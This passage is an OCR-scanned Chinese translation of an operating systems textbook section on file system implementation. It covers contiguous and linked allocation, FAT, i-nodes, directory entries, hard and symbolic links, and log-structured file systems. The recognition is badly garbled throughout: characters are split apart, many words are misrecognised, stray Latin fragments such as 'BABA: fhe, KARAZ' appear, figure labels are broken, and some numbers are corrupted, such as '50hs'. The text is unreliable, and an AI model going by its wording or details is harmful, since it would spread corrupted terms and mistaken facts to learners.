存放 文件 系统 目录 树 的 根部 。 最 后 ， 人 磁盘 的 其 他 部 分 存放 了 其 他 所 有 
的 目录 和 文件 。 


4.3.2 ”文件 的 实现 


文件 存储 的 实现 的 关键 问题 是 记录 各 个 文件 分 别 用 到 哪些 磁盘 
块 。 不 同 操作 系统 采用 不 同 的 方法 。 这 一 节 ， 我 们 讨论 其 中 的 一 些 方 
法 。 


最 简单 的 分 配方 案 是 把 每 个 文件 作为 一 连 串 连续 数据 块 存储 在 磁 
一 上 。 所 以 ， 在 块 大 小 为 1KB 的 磁盘 上 ，50KB 的 文件 要 分 配 50 个 连续 
的 块 。 对 于 块 大 小 为 2KB 的 磁盘 ， 将 分 配 25 个 连续 的 块 。 


在 图 4-10a 中 是 一 个 连续 分 配 的 例子 。 这 里 列 出 了 涉 40 块 ， 从 左面 
从 0 块 开始 。 初 始 状 态 下 ， 磁 副 是 空 的 。 接 着 ， 从 磁盘 开始 处 (ERO) 
开始 写 入 长 度 为 4 块 的 文件 A。 紧 接着 ， 在 文件 A 的 结尾 开始 写 入 一 个 3 
块 的 文件 B。 


文件 文件 文件 we 
(4 块 ) (6 块 ) (12 块 ) (3 块 ) 
anni A 人 i R cc“ 
1 — eS (____ -一 一 一 一 
文件 B 文件 D 文件 F 
(3 块 ) (5 块 ) (6 块 ) 
a) 
(文件 A) (文件 C) (文件 E) (文件 G) 
r a ` ‘ = ` Pe aa 
一 一 一 一) -一 一 一 
文件 B 5 个 空闲 块 6 个 空闲 块 
b) 


图 4-10 a) 为 7 个 文件 连续 分 配 空 间 ;，b) 删 除 文件 D 和 F 后 磁 副 的 状态 


请 注意 ， 每 个 文件 都 从 一 个 新 的 块 开始 ， 这 样 如 果 文 件 A 实 际 上 只 
有 31/, 块 ， 那么 最 后 一 块 的 结尾 会 当 费 一 些 空间 。 在 图 4-10 中 ， 一 共 列 
出 了 7 个 文件 ， 每 一 个 都 从 前 面 文件 结尾 的 后 续 块 开始 。 加 阴影 古 为 了 
容易 表示 文件 分 隔 ， 在 存储 中 并 没有 实际 的 意义 


续 磁 公 空 间 分 配方 案 有 两 大 优势 。 首 和 匈 ， 实 现 简 单 ， 记 录 每 个 
文件 用 到 的 磁 副 块 简化 为 只 需 记 住 两 个 数字 即 可 第 一 块 的 磁盘 地 址 
和 文件 的 块 数 。 给 是 了 第 一 块 的 编号 ， 一 个 简单 的 加 法 束 可 以 找到 任 
何其 他 块 的 编号 。 


其 次 ， 读 操作 性 能 较 好 ， 因 为 在 单个 操作 中 吏 可 以 从 磁盘 上 读 出 
整个 文件 。 只 需要 一 次 寻找 〈 对 第 一 个 块 ) 。 之 后 不 再 需要 寻 道 和 旋 
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单 且 具有 高 的 性 能 。 


这 里 有 两 个 文件 (DAF) 被 删除 了 。 当 删除 一 个 文件 时 ， 它 占用 的 块 
自然 束 释 放 了 ， 在 磁盘 上 留 下 一 堆 空 亲 块 。 人 磁盘 不 会 在 这 个 位 置 挤 压 
挥 这 个 空洞， 因为 这 样 会 涉及 复制 空洞 之 后 的 所 有 文件 ， 可 能 会 有 上 
百 万 的 块 。 绪 采 是 ， 和 位 一 上 最 终 既 包括 文件 也 有 至 洞 ， 如 图 4-10 中 所 摘 
述 的 那样 。 


开始 时 ， 碎 片 并 不 古 问 题 ， 因 为 每 个 新 的 文件 部 在 先前 文件 的 磁 
BABA: fhe, KARAZ, STOR AME, RAE 
新 使 用 空洞 中 的 空闲 空间 。 前 者 由 于 代价 太 高 而 不 可 行 ， 后 者 需要 维 
护 一 个 空洞 列表 ， 这 是 可 行 的 。 但 是 ， 当 创建 一 个 新 的 文件 时 ， 为 了 
挑选 合适 大 小 的 空洞 存 入 文件 ， 束 有 必要 知道 该 文件 的 最 终 大 小 。 


设想 这 样 一 种 设计 的 结果 : 为 了 录入 一 个 文档 ， 用 户 局 动 了 文本 
编辑 器 或 字 处 理 软件 。 程 序 首 先 询 问 最 终 文件 的 大 小 会 是 多 少 。 这 个 
问题 必须 回答 ， 否 则 程序 就 不 能 继续 。 如 果 给 出 的 数字 最 后 被 证 明 小 
于 文件 的 实际 大 小 ， 该 程序 会 终止 ， 因 为 所 使 用 的 磁盘 空洞 已 经 满 
了 ， 没 有 地 方 放置 文件 的 剩余 部 分 。 如 果 用 户 为 了 避免 这 个 问题 而 给 
出 不 实际 的 较 大 的 数字 作为 最 后 文件 的 大 小 ， 比 如 ，100 MB， 编 辑 般 


可 能 找 不 到 如 此 大 的 空洞 ， 从 而 宣布 无 法 创建 该 文件 。 当 然 ， 用 户 有 
权 下 一 次 使 用 比如 50MB 的 数字 再 次 局 动 编辑 山 ， 如 此 进行 下 去 ， 直 到 
找到 一 个 合适 的 空洞 为 止 。 不 过 ， 这 种 方式 看 来 不 会 使 用 户 高 兴 。 


然而 ， 存 在 着 一 种 情形 ， 使 得 连续 分 配方 案 是 可 行 的， 而 且 ， 实 
际 上 这 个 办 法 在 CD-ROM 上 被 广泛 使 用 看 。 在 这 里 所 有 文件 的 天 小 都 
事先 知道 ， 并 且 在 CD-ROM 文 件 系统 的 后 续 使 用 中 ， 这 些 文件 的 大 小 
也 不 再 改变 。 在 本 章 的 后 面 ， 我 们 将 讨论 最 第 见 的 CD-ROM 文 件 系 


统 。 


DVD 的 情况 有 些 复杂 。 原 则 上 ， 一 个 90 分 钟 的 电影 可 以 编码 成 一 
个 独立 的 、 大 约 4.5GB 的 文件 。 但 是 文件 系统 所 使 用 的 UDF (Universal 
Disk Format) 格式 ， 使 用 了 一 个 30 位 的 数 来 代表 文件 长 度 ， 从 而 把 文 
件 大 小 限制 在 1GB。 其 结果 是 ，DVD 电 影 一 般 存 储 在 3 个 或 4 个 1GB 的 
连续 文件 中 。 这 些 构 成 一 个 逻辑 文件 (电影 ， 的 物理 文件 块 被 称 作 


extents ° 


正如 第 1 对 中 所 提 到 的 ， 在 计算 机 科学 中 ， 随 着 新 一 代 技 术 的 出 
现 ， 历 史 往 往 重 复 着 自己 。 多 年 前 ， 连 续 分 配 由 于 其 简单 和 高 性 能 
(没有 过 多 考虑 用 户 友好 性 ) 被 实际 用 在 磁 副 文件 系统 中 。 后 来 由 于 
讨厌 在 文件 创建 时 不 得 不 指定 最 终 文件 的 大 小 ， 这 个 想法 被 放弃 了 。 
但 是 ， 随 着 CD-ROM、DVD 以 及 其 他 一 次 性 写 光 学 介质 的 出 现 ， 突 然 
间 连 续 分 配 又 成 为 一 个 好 主意 。 所 以 研究 那些 具有 清晰 和 简洁 概念 的 


老式 系统 和 思想 是 很 重要 的 ， 因 为 它们 有 可 能 以 一 种 令 人 吃 慰 的 方式 
在 未 来 系统 中 获得 应 用 。 


存储 文件 的 第 二 种 方法 十 为 每 个 文件 构造 亿 c 副 块 和 链表， 如 图 4-11 所 
示 。 每 个 块 的 第 一 个 字 作为 指向 下 一 块 的 指针 ， 块 的 其 他 部 分 存放 数 
据 。 


物理 块 


图 4-11 以 磁盘 块 的 链表 形式 存储 文件 


与 连续 分 配方 案 不 同 ， 这 一 方法 可 以 充分 利用 每 个 磁盘 块 。 不 会 
因为 磁盘 碎片 (除了 最 后 一 块 中 的 内 部 碎片 ， 而 浪费 存储 空间 。 同 
样 ， 在 目录 项 中 ， 只 需要 存放 第 一 块 的 磁 副 地 址 ， 文 件 的 其 他 块 就 可 
以 从 这 个 首 块 地 址 查找 到 。 


男 一 方面 ， 在 链表 分 配方 案 中 ， 尽 管 顺序 读 文 件 非 党 方便， 但 是 
随机 存 取 却 相当 缓慢 。 要 获得 块 n， 操 作 系统 每 一 次 都 必须 从 头 开 始 ， 
并 且 要 先 读 前 面 的 n-1 块 。 显 然 ， 进 行 如 此 多 的 读 操作 太 慢 了 。 
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确实 降低 了 系统 的 运行 效率 ， 因 为 许多 程序 都 是 以 长 度 为 2 的 整数 次 需 
来 读 写 磁盘 块 的 。 由 于 每 个 块 的 前 几 个 字 节 被 指 同 下 一 个 块 的 指针 所 
占据 ， 所 以 要 读 出 完整 的 一 个 块 ， 台 需要 从 两 个 磁盘 块 中 获得 和 拼接 
信息 ， 这 就 因 复 制 引 发 了 额外 的 开销 。 


3. 在 内 存 中 采用 表 的 链表 分 配 


如 果 取 出 每 个 磁盘 块 的 指针 字 ， 把 它 放 在 内 存 的 一 个 表 中 ， 束 可 
以 解决 上 述 链表 的 两 个 不 足 。 图 4-12 表 示 了 图 4-11 所 示例 子 的 内 存 中 表 
的 内 容 。 这 两 个 图 中 有 两 个 文件 ， 文 件 A 依 次 使 用 了 磁盘 块 4、7、2、 
10 和 12， 文 件 B 依 次 使 用 了 磁盘 块 6、3、11 和 14。 利 用 图 4-12 中 的 表 ， 
可 以 从 第 4 块 开始 ， 顺 着 链 走 到 最 后 ， 找 到 文件 A 的 全 部 磁盘 块 。 同 


样 ， 从 第 6 块 开 始 ， 顺 着 链 走 到 最 后 ， 也 能 够 找 出 文件 B 的 全 部 磁盘 
块 。 这 两 个 链 都 以 一 个 不 属于 有 效 磁 盘 编 号 的 特殊 标记 (如 -1) 结束 。 
内 存 中 的 这 样 一 个 表格 称 为 文件 分 配 表 (File Allocation Table, 

FAT) 。 


文件 A 从 
这 里 开始 
文件 B 从 


图 4-12 在 内 存 中 使 用 文件 分 配 表 的 链表 分 配 


按 这 类 方式 组 织 ， 整 个 块 部 可 以 存放 数据 。 进 而 ， 随 机 存 取 也 容 
易 得 多 。 虽 然 仍 要 顺 看 链 在 文件 中 碍 找 给 定 的 侦 移 量 ， 但 是 整个 链表 
都 存放 在 内 存 中 ， 所 以 不 需要 任何 磁盘 引用 。 与 前 面 的 方法 相同 ， 不 
管 文件 有 多 大 ， 在 目录 项 中 只 需 记录 一 个 整数 URS) ， 按 照 它 
束 可 以 找到 文件 的 全 部 块 。 


这 种 方法 的 主要 缺点 是 必须 把 整个 表 都 存放 在 内 存 中 。 对 于 200 
GB 的 磁 到 和 1KB 大 小 的 块 ， 这 张 表 需 要 有 2 亿 项 ， 每 一 项 对 应 于 这 2 亿 
个 磁盘 块 中 的 一 个 块 。 每 项 至 少 3 个 字 节 ， 为 了 提高 查找 速度 ， 有 时 需 
要 4 个 字 广 。 根 据 系统 对 空间 或 时 间 的 优化 方案 ， 这 张 表 要 占用 600MB 
或 800MB 内 存 ， 不 太 实用 。 很 显然 FAT 方 案 对 于 大 磁盘 而 言 不 太 合 适 。 
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赋予 一 个 称 为 节点 (index-node) 的 数据 结构 ， 其 中 列 出 了 文件 属性 和 
文件 块 的 磁 表 地址 。 几 4-13 中 坪 一 个 商 单 例子 的 摘 述 。 给 定 i 点 ， 融 
有 可 能 找到 文件 的 所 有 块 。 相 对 于 在 内 存 中 采用 表 的 方式 而 言 ， 这 种 
机 制 具 有 很 大 的 优势 ， 即 只 有 在 对 应 文件 打开 时 ， 其 i 点 才 在 内 存 
中 。 如 末 每 个 节点 占有 n 个 字 方 ， 最 多 k 个 文件 同时 打开 ,那么 为 了 打 
开 文 件 而 保留 节点 的 数组 所 占据 的 全 部 内 存 仪 仅 是 kn 个 字 节 。 只 需要 


提前 保留 少量 的 空间 。 
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目 身 的 大 小 。 如 采 磁 副 有 n 块 ， 该 表 需 要 n 个 表 项 。 由 于 磁盘 变 得 更 
大 ， 该 表格 也 线性 随 之 增加 。 相 反 ，i 点 机 制 需要 在 内 存 中 有 一 个 数 
组 ， 其 大 小 正比 于 可 能 要 同时 打开 的 最 大 文件 个 数 。 它 与 磁盘 是 
10GB、100GB 还 是 1000GB 无 关 。 


i 蕊 的 一 个 问题 是 ， 如 采 每 个 i 点 只 能 存储 固定 数量 的 磁 表 地 
址 ， 那 么 当 一 个 文件 所 售 的 磁盘 块 的 数目 超出 了 im7 点 所 能 容纳 的 数目 
BAD? 一 个 解决 方案 是 最 后 一 个 “磁盘 地 址 ?不 指 同 数 据 块 ， 而 十指 
向 一 个 包含 磁 强 块 地 址 的 块 的 地 址 ， 如 图 4-13 所 示 。 更 高 级 的 解决 方案 
是 : 可 以 有 两 个 或 更 多 个 包含 人 磁 副 地 址 的 块 ， 或 者 指向 其 他 存放 地 址 
的 磁 强 块 的 磁盘 块 。 在 后 面 讨论 UNIX 时 ， 我 们 还 将 涉及 if 点。 


文件 属性 


磁盘 块 3 的 地 址 
磁盘 块 4 的 地 址 
磁盘 块 5 的 地 址 


磁盘 块 6 的 地 址 
磁盘 块 7 的 地 址 
h 


指针 块 的 地 址 


图 4-13 i 节点 的 例子 


4.3.3 ”日 录 的 实现 


在 读 文 件 前 ， 必 须 先 打开 文件 。 打 开 文 件 时 ， 操 作 系统 利用 用 户 
给 出 的 路 径 名 找到 相应 目录 项 。 目 录 项 中 提供 了 查找 文件 磁盘 块 所 需 
要 的 信息 。 因 系统 而 异 ， 这 些 信息 有 可 能 是 整个 文件 的 磁 强 地 址 (对 
于 连续 分 配方 案 ) 、 第 一 个 块 的 编号 (对 于 两 种 链表 分 配方 案 ) 或 者 
征 i 入 点 号 。 无 论坛 样 ， 目 永 系统 的 主要 功能 是 把 ASCII 文 件 名 映射 成 
定位 文件 数据 所 需 的 信息 。 


与 此 密切 相关 的 问题 是 在 何 处 存放 文件 属性 。 每 个 文件 系统 维护 
诸如 文件 所 有 者 以 及 创建 时 间 等 文件 属性 ， 它 们 必须 存储 在 某 个 地 
方 。 一 种 显而易见 的 方法 古 把 文件 属性 直接 存放 在 目录 项 中 。 很 多 系 
统 确实 是 这 样 实现 的 。 这 个 办 法 用 图 4-14a 说 明 。 在 这 个 简单 设计 中 ， 
目录 中 有 一 个 固定 大 小 的 目录 项 列表 ， 每 个 文件 对 应 一 项 ， 其 中 包含 
一 个 (HEKE) 文件 名 、 一 个 文件 属性 结构 以 及 用 以 说 明 磁 盘 块 位 
置 的 一 个 或 多 个 磁盘 地 址 (至 某 个 最 大 值 )。 


aa 
= 
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a) b) 数据 结构 


图 4-14 a) 人 简单 目录 ,包含 固定 大 小 的 目录 项 ， 在 目录 项 中 有 磁盘 地 
址 和 属性 ;，b) 每 个 目录 项 只 引用 i 市 点 的 目录 


对 于 采用 i 节点 的 系统 ， 还 存在 男 一 种 方法 ， 即 把 文件 属性 存放 在 i 
节点 中 而 不 是 目录 项 中 。 在 这 种 情形 下 ， 目 录 项 会 更 短 : 只 有 文件 名 
和 i 节点 号 。 这 种 方法 参见 图 4-14b。 后 面 我 们 会 看 到 ， 与 把 属性 存放 到 
目录 项 中 相 比 ， 这 种 方法 更 好 。 图 4-14 中 的 两 种 处 理 方法 分 别 对 应 
Windows 和 UNIX， 在 后 面 我 们 将 讨论 它们 。 


到 目前 为 止 ， 我们 已 经 假设 文件 具有 较 短 的 、 固 定 长 度 的 名 字 。 
在 MS-DOS 中 ， 文 件 有 1~8 个 字符 的 基本 名 和 1~3 字 符 的 可 选 扩展 名 。 
在 UNIX V7 中 文件 名 有 1~14 个 字符 ， 包 括 任 何 扩展 名 。 但 是 ， 几 乎 所 
有 的 现代 操作 系统 都 支持 可 变 长 度 的 长 文件 名 。 那 么 它们 是 如 何 实 现 
的 呢 ? 


最 简单 的 方法 是 给 予 文件 名 一 个 长 度 限 制 ， 典 型 值 为 255 个 字符 ， 
然后 使 用 图 4-14 中 的 一 种 设计 ， 并 为 每 个 文件 名 你 留 255 个 字符 空间 。 


这 种 处 理 很 简单 ， 但 是 浪费 了 大 量 的 目录 空间 ， 因 为 只 有 很 少 的 文件 
会 有 如 此 长 的 名 字 。 从 效率 考虑 ， 我 们 希望 有 其 他 的 结构 。 


一 种 蔡 代 方案 是 放弃 “所 有 目录 项 大 小 一 样 * 的 想法 。 这 种 方法 
中 ， 每 个 目录 项 有 一 个 固定 部 分 ， 这 个 固定 部 分 通常 以 目录 项 的 长 度 
开始 ， 后 面 是 固定 格式 的 数据 ， 通 稼 包括 所 有 者 、 创 建 时 间 、 保 护 信 
恩 以 及 其 他 属性 。 这 个 固定 长 度 的 头 的 后 面 是 实际 文件 名 ， 可 能 是 如 
图 4-15a 中 的 正 序 格式 放置 (如 SPARC 机 器 ) 中 。 在 这 个 例子 中 ， 有 三 
个 文件 ，project-budget、personnel 和 foo。 每 个 文件 名 以 一 个 特殊 字符 
(通常 是 0) 结束 ， 在 图 4-15 中 用 带 义 的 矩形 表示 。 为 了 使 每 个 目录 项 
从 衬 的 边界 开始 ， 每 个 文件 名 被 填充 成 整数 个 字 ， 如 图 4-15 中 市 阴影 的 


和 窍 形 所 示 。 


指向 文件 1 的 文件 名 

文件 1 属性 

指向 文件 2 的 文件 名 
文件 2 属性 


文件 1 项 长 度 


Pe 
件 的 项 


指向 文件 3 的 文件 名 
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图 4-15 在 目 永 中 处 理 长 文件 名 的 两 种 方法 : a) 在 行 中 ;D) 在 堆 中 


这 个 方法 的 缺点 是 ， 当 移 走 文件 后 ， 就 引入 了 一 个 长 度 可 变 的 衬 
除 ， 而 下 一 个 进来 的 文件 不 一 定 正 好 适合 这 个 至 际 。 这 个 问题 与 我 们 
已 经 看 到 的 连续 磁盘 文件 的 问题 生 一 样 的 ， 由 于 整个 目 永 在 内 存 中 ， 
所 以 只 有 对 目 永 进行 紧 旋 操作 才 可 克 省 至 间 。 夯 一 个 问题 是 ， 一 个 目 
杂项 可 能 会 分 布 在 多 个 页 面 上 ， 在 读 取 文件 名 时 可 能 发 生 页 面 故 障 。 


处 理 可 变 长 度 文件 名 字 的 男 一 种 方法 是 ， 使 目录 项 目 身 都 有 固定 
长 度 ， 而 将 文件 名 放置 在 目录 后 面 的 堆 中 ， 如 图 4-15b 所 示 。 这 一 方法 
的 优点 是 ， 当 一 个 文件 目录 项 被 移 走 后 ， 男 一 个 文件 的 目录 项 总 是 可 
以 适合 这 个 至 际 。 当 然 ， 必 须要 对 堆 进行 管理 ， 而 在 处 理 文 件 名 时 页 


面 故 障 仍旧 会 发 生 。 男 一 个 小 优点 是 文件 名 不 再 需要 从 字 的 边界 开 
台 ， 这 样 ， 原 先 在 图 4-15a 中 需要 的 填充 字符 ， 在 图 4-15b 中 的 文件 名 之 
后 就 不 再 需要 了 。 


到 目前 为 止 ， 在 需要 查找 文件 名 时 ， 所 有 的 方案 都 是 线性 地 从 类 
到 尾 对 目录 进行 搜索 。 对 于 非常 长 的 目录 ,线性 查找 束 太 慢 了 。 加 快 
查找 速度 的 一 个 方法 是 在 每 个 目录 中 使 用 散 列 表 。 设 表 的 大 小 为 nm。 在 
输入 文件 名 时 ， 文 件 名 被 散 列 到 1 和 n-1 之 间 的 一 个 值 ， 例 如 ， 它 被 n 
除 ， 并 取 余 数 。 其 他 可 以 采用 的 方法 有 ， 对 构成 文件 名 的 子 求 和 ， 其 
结 末 个 n 除 ， 或 菏 些 类 似 的 方法 。 


不 论 哪 种 方法 都 要 对 与 散 列 码 相对 应 的 散 列表 表 项 进行 检查 。 如 
果 该 表 项 没有 被 使 用 ， 就 将 一 个 指向 文件 目录 项 的 指针 放 入 ， 文 件 目 
录 项 紧 连 在 散 列表 后 面 。 如 果 该 表 项 被 使 用 ， 就 构造 一 个 链表 ， 该 
了 链 表 的 表 头 指针 存放 在 该 表 项 中 ， 并 链接 所 有 具有 相同 散 列 值 的 文件 
目录 项 。 


查找 文件 按照 相同 的 过 程 进 行 。 散 列 处 理 文件 名 ， 以 便 选 择 一 个 
散 列 表 项 。 检 查 链 表 头 在 该 位 置 上 的 所 有 表 项 ， 得 看 要 找 的 文件 名 二 
否 存在 。 如 果 名 字 不 在 该 链 上 ， 该 文件 就 不 在 这 个 目录 中 。 


使 用 散 列 表 的 优点 是 查找 非常 迅速 。 其 缺点 是 需要 复杂 的 管理 。 
只 有 在 预计 系统 中 的 目录 经 常会 有 成 百 上 干 个 文件 时 ， 才 把 散 列 方案 


真正 作为 备用 方案 考虑 。 


一 种 完全 不 同 的 加 快 大 型 目录 查找 速度 的 方法 是 ， 将 查找 结果 存 
入 高 速 缓 存 。 在 开始 查找 之 前 ， 先 查看 文件 名 是 否 在 高 速 缓存 中 。 如 
果 是 ， 该 文件 可 以 立即 定位 。 当 然 ， 只 有 在 构成 查找 主体 的 文件 非常 
少 的 时 候 ， 高 速 缓存 的 方案 才 有 效果 。 


[1] 处 理 机 中 的 一 串 字 符 存 放 的 顺序 有 正 序 (big-endian) 和 逆序 (little- 
endian) 之 分 。 正 序 存 放 就 是 高 字 节 存放 在 前 低 字 节 在 后 ， 而 滥 序 存放 
就 是 低 字 节 在 前 高 字 节 在 后 。 例 如 ， 十 六 进 制 数 为 A02B， 正 序 存放 就 
是 A02B， 逆 序 存放 就 是 2BA0。 一 一 译 者 注 


4.3.4 共享 文件 


当 几 个 用 户 同 在 一 个 项 目 里 工作 时 ， 他 们 常常 需要 共享 文件 。 其 
结果 是 ， 如 果 一 个 共享 文件 同时 出 现在 属于 不 同 用 户 的 不 同 目录 下 ， 
工作 起 来 就 很 方便 。 图 4-16 再 次 给 出 图 4-7 所 示 的 文件 系统 ， 只 是 C 的 一 
个 文件 现在 也 出 现在 B 的 目录 下 。B 的 目录 与 该 共享 文件 的 联系 称 为 一 
个 连接 (link) 。 这 样 ， 文 件 系统 本 身 是 一 个 有 向 无 环 图 (Directed 
Acyclic Graph, DAG) 而 不 是 一 棵 树 。 


Bie: 


图 4-16 有 共享 文件 的 文件 系统 
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址 ， 则 当 连 接 文 件 时 ， 必 须 把 C 目 台中 的 磁盘 地 址 复制 到 B 目 好 中 。 如 
果 B 或 C 随 后 义 往 该 文件 中 添加 内 容 ， 则 新 的 数据 块 将 只 列 入 进行 添加 
工作 的 用 户 的 目录 中 。 其 他 的 用 户 对 此 改变 是 不 知道 的 。 所 以 违背 了 
共享 的 目的 。 


有 两 种 方法 可 以 解决 这 一 问题 。 在 第 一 种 解决 方案 中 ， 磁 盘 块 不 
列 和 人 目 孙 ， 而 是 列 入 一 个 与 文件 本 吴 关 联 的 小 型 数据 结构 中 。 目 永 将 
指向 这 个 小 型 数据 结构 。 这 是 UNIX 系 统 中 所 采用 的 方法 (小 型 数据 结 


构 即 是 i 节点 ) 。 


在 第 二 种 解决 方案 中 ， 通 过 让 系统 建立 一 个 类 型 为 LINK 的 新 文 
件 ， 并 把 该 文件 放 在 B 的 目录 下 ， 使 得 B 与 C 的 一 个 文件 存在 连 授 。 新 
的 文件 中 只 包含 了 它 所 连接 的 文件 的 路 径 名 。 当 B 读 该 连接 文件 时 ， 操 
作 系 统 查 看 到 要 读 的 文件 是 LINK 类 型 ， 则 找到 该 文件 所 连接 的 文件 的 
名 字 ， 并 且 去 读 那个 文件 。 与 传统 〈 硬 ) 连接 相对 比 起 来 ， 这 一 方法 
称 为 符号 连接 (symbolic linking) 。 


以 上 每 一 种 方法 都 有 其 缺点 。 第 一 种 方法 中 ， 当 B 连 接 到 共享 文件 
时 ， 证 点 记录 文件 的 所 有 者 是 C。 建 立 一 个 连接 并 不 改变 所 有 关系 
( 见 图 4-17) ， 但 它 将 i 节点 的 连接 计数 加 1， 所 以 系统 知道 目前 有 多 少 
目 邓 项 指 疝 这 个 文件 。 


如 琳 以 后 C 试 图 删除 这 个 文件 ， 系 统 将 面临 问题 。 如 琳 系 统 删 除 文 
件 并 清除 i 市 点，B 则 有 一 个 目录 项 指 癌 一 个 无 效 的 节点。 如 琳 该 节点 
以 后 分 配给 男 一 个 文件 ， 则 B 的 连接 指 疝 一 个 错误 的 文件 。 系 统 通 过 i 
节 扩 中 的 计数 可 知 该 文件 仍然 被 引用 ， 但 是 没有 办 法 找到 指 癌 该 文件 
的 全 部 目录 项 以 删除 它们 。 指 向 目 邓 的 指针 不 能 存储 在 i 节点 中 ， 原 因 
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惟一 能 做 的 就 古 只 删除 C 的 目录 项 ， 但 是 将 i 市 太保 留 下 来 ， 并 将 
计数 置 为 1， 如 图 4-17c 所 示 。 而 现在 的 状况 是 ， 只 有 B 有 指 癌 该 文件 的 
目录 项 ， 而 该 文件 的 所 有 者 是 C。 如 琳 系 统 进 行 记 账 或 有 了 配额， 那么 C 
将 继续 为 该 文件 付 账 直到 B 决 定 删除 它 ， 如 果真 是 这 样 ， 只 有 到 计数 变 
为 0 的 时 刻 ， 才 会 删除 该 文件 。 


C 的 目录 B 的 目录 C 的 目录 B 的 目录 


所 有 者 三 C 
计数 三 2 


b) c) 


Al 4-17 连接 之 前 的 状况 ; b) 创 建 连 接 之 后 ;GO 当 所 有 者 删除 文件 
后 


对 于 符号 连接 ， 以 上 问题 不 会 发 生 ， 因 为 只 有 真正 的 文件 所 有 者 
才 有 一 个 指向 i 点 的 指针 。 连 接 到 该 文件 上 的 用 户 只 有 路 径 名 ， 没 有 
指 癌 误 的 指针 。 当 文件 所 有 者 删除 文件 时 ， 该 文件 被 销毁 。 以 后 寿 
试图 通过 符号 连接 访问 该 文件 将 导致 失败 ， 因 为 系统 不 能 找到 该 文 
件 。 删 除 符号 连接 根本 不 影响 该 文件 。 


符号 连接 的 问题 是 需要 额外 的 开销 。 必 须 读 取 包含 路 径 的 文件 ， 
然后 要 一 个 部 分 一 个 部 分 地 扫描 路 径 ， 直 到 找到 i7 点 。 这 些 操 作 也 许 
需要 很 多 次 额外 的 磁盘 存 取 。 此 外 ， 每 个 符号 连接 都 需要 额外 的 i 节 
点 ， 以 及 额外 的 一 个 磁盘 块 用 于 存储 路 径 ， 虽 然 如 果 路 径 名 很 短 ， 作 
为 一 种 优化 ， 系 统 可 以 将 它 存 储 在 ii 点 中 。 符 号 连接 有 一 个 优势 ， 即 
只 要 简单 地 提供 一 个 机 器 的 网 络 地 址 以 及 文件 在 该 机 器 上 驻 留 的 路 
径 ， 就 可 以 连接 全 球 任 何 地 方 的 机 器 上 的 文件 。 


还 有 为 一 个 由 连接 市 来 的 问题 ， 在 符号 连接 和 其 他 方式 中 都 存 
在 。 如 末 允 许 连接 ， 文 件 有 两 个 或 多 个 路 径 。 查 找 一 指定 目录 及 其 子 
目录 下 的 全 部 文件 的 程序 将 多 次 定位 到 被 连接 的 文件 。 例 如 ， 一 个 将 
某 一 目录 及 其 子 目 好 下 的 文件 转 储 到 磁带 上 的 程序 有 可 能 多 次 复制 一 
个 被 连 授 的 文件 。 进 而 ， 如 来 接 大 把 爸 市 读 进 为 一 台 机 硕 ， 除 非 转 储 


程序 具有 智能 ， 否 则 被 连接 的 文件 将 被 两 次 复制 到 磁盘 上 ， 而 不 古 只 
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4.3.5 日 志 结 构 文件 系统 


不 断 进步 的 科技 给 现 有 的 文件 系统 带 来 了 更 多 的 挑战 。 特 别 是 
CPU 的 运行 速度 越 来 越 快 ， 人 磁盘 容量 越 来 越 大 ， 价 格 也 越 来 越 便 宜 
〈 但 是 磁盘 速度 并 没有 增 快 多 少 ) ， 同 时 内 存 容量 也 以 指数 形式 增 
长 。 而 没有 得 到 快速 发 展 的 参数 是 磁 副 的 寻 道 时 间 。 所 以 这 些 问题 综 
合 起 来 ， 便 成 为 影响 很 多 文件 系统 性 能 的 一 个 瓶颈 。 为 此 ，Berkeley 
设计 了 一 种 全 新 的 文件 系统 ， 试 图 缓解 这 个 问题 ， 即 日 志 结 构 文件 系 
统 (Log-structured File System, LFS) 。 在 这 一 节 里 ， 我 们 简要 说 明 
LFS 是 如 何 工作 的 。 如 果 需 要 了 人 解 更 多 相关 知识 ， 请 参阅 (Rosenblum 
和 Ousterhout，1991) ° 


促使 设计 LFS 的 主要 原因 是 ，CPU 的 运行 速度 越 来 越 快 ，RAM 内 
存 容量 变 得 更 大 ， 同 时 磁盘 高 速 缓存 也 迅速 地 增加 。 进 而 ， 不 需要 磁 
盘 访 问 操作 ， 就 有 可 能 满足 直接 来 目 文件 系统 高 速 缓存 的 很 大 一 部 分 
读 请 求 。 所 以 从 上 面 的 事实 可 以 推出 ， 未 来 多 数 的 人 磁 副 访问 是 写 操 
作 ， 这 样 ， 在 一 些 文件 系统 中 使 用 的 提前 读 机 制 (需要 读 取 数据 之 前 
预 取 磁 副 块 ; ， 并 不 能 获得 更 好 的 性 能 。 


更 为 糟糕 的 情况 是 ， 在 大 多 数 文件 系统 中 ， 写 操作 往往 都 是 零碎 
的 。 一 个 50hs 的 磁盘 写 操 作 之 前 通常 需要 10ms 的 村 道 时 间 和 4ms 的 旋 


转 延 到 时 间 ， 可 见 零碎 的 磁盘 写 操 作 是 极其 没有 效率 的 。 根 据 这 些 参 
数 ， 磁 一 的 效率 降低 到 19% 以 下 。 


为 了 看 看 这 样 小 的 零碎 写 操作 从 何 而 来 ， 考 虑 在 UNIX 文 件 系统 
创建 一 个 新 文件 。 为 了 写 这 个 文件 ， 必 须 写 该 文件 目 孙 的 i7 > 目录 
块 、 文 件 的 fi 点 以 及 文件 本 身 。 而 这 些 写 操作 都 有 可 能 被 延迟 ， 那 么 
如 果 在 写 操作 完成 之 前 发 生死 机 ， 束 可 能 在 文件 系统 中 造成 严重 的 不 
一 致 性 。 正 因为 如 此 ，iPp 点 的 写 操 作 一 般 是 立即 完成 的 。 


出 于 这 一 原因 ，LFS 的 设计 者 决定 重新 实现 一 种 UNIX 文 件 系统 ， 
该 系统 即使 对 于 一 个 大 部 分 由 零碎 的 随机 写 操作 组 成 的 任务 ， 同 样 能 
够 充分 利用 磁 副 的 市 宽 。 其 基本 思想 是 将 整个 磁 表 结 构 化 为 一 个 日 
志 。 每 隔 一 段 时 间 ， 或 是 有 特殊 需要 时 ， 被 缓冲 在 内 存 中 的 所 有 未 决 
的 写 操作 都 被 放 到 一 个 单独 的 段 中 ， 作 为 在 日 志 末 尾 的 一 个 邻接 段 写 
入 位 副 。 一 个 单独 的 段 可 能 会 包括 i 点、 目录 块 、 数 据 块 或 者 都 有 。 
每 一 个 段 的 开始 都 是 该 段 的 摘要 ， 说 明 该 段 中 都 包含 哪些 内 容 。 如 果 
所 有 的 段 乎 均 在 1MB 左 右 ， 那 么 区 儿 乎 可 以 利用 磁 表 的 完整 市 宽 。 


